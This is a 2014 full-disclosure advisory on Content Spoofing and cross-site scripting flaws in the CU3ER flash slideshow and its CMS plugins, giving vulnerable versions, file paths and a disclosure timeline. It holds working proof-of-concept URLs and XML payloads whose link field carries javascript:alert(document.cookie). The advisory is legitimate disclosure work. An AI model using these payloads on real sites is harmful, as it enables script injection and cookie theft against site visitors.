Hello 3APA3A!
Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is popular flash file and in Google's index there are up to million web sites with it (inurl:cu3er.swf filetype:swf - now Google shows 994000 results).
There are any plugins for different CMS with CU3ER. These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone. Such plugins as: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, collective.cu3er for Plone.
Vulnerable are all plugins with flash file of CU3ER.
Vulnerable are wpCU3ER 0.75 and previous versions.
Vulnerable are jCU3ER 0.12 and previous versions.
Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions.
Vulnerable are all versions of cu3er-silverstripe-extension.
Vulnerable are collective.cu3er 0.1 and previous versions.
MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com
Vinaora
http://code.google.com/p/vinaora-3d-slideshow
Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module
Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1
Path to flash-file in different plugins:
http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf
http://site/components/com_cu3er/flash/CU3ER.swf
http://site/media/mod_vinaora_cu3er/flash/cu3er.swf
http://site/cu3er-silverstripe-extension/flash/cu3er.swf
http://site/collective/cu3er/browser/flash/cu3er.swf
The first two plugins use the last version of CU3ER, and three others use version 0.9.2 (and also in old versions of wp-cu3er).
Content Spoofing (Content Injection) (WASC-12):
http://site/cu3er.swf?xml=http://site2/1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml=http://site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.
These are examples of CS and XSS attacks on version CU3ER 0.9.2. For the last version 1.24 it's needed different xml-files and different parameter is set to flash-file.
Content Spoofing (WASC-12):
http://site/cu3er.swf?xml_location=http://site2/1.xml
File 1.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>http://websecurity.com.ua</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
File xss.xml:
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml_location=http://site2/xss.xml
File xss.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>javascript:alert(document.cookie)</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua